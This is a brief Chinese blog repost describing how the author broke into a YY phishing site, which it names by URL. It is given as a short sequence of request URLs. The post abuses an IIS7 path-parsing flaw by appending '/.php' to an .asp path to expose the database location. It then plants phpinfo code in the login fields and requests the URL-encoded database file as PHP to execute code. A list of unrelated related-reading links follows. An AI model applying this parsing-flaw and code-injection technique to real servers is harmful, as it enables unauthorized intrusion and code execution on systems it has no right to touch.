一个钓鱼站爆裤小记

一个钓鱼站爆裤小记

在乌云上看到的

目标为YY钓鱼地址是：http://226729.137167.20la.com.cn/

判断数据库连接地址为http://226729.137167.20la.com.cn/config.asp

然后用IIS7解析漏洞

http://226729.137167.20la.com.cn/config.asp/.php

爆出了数据库路径

在登录账户和密码处插个phpinfo，然后连接http://226729.137167.20la.com.cn/PoYser%2fdatas%2f%23%23Admin%23.asp%23/.php 成功执行php代码。
相关阅读:
静态库中的静态变量连接失败的解决
 (转)Virtual PC 2007虚拟网络设置
 (zt)iPhone Developer注册
 (zt)正则表达式30分钟入门教程
 (zt)Flex SDK 3.2和Flex Builder 3.0.2升级
 (转)完成端口之性能优化
 (摘)法拉利年代型号
 安装windows下的NDS开发环境
 [C#]小问题
 javascript "未结束字符串"
原文地址：https://www.cnblogs.com/hookjoy/p/4036380.html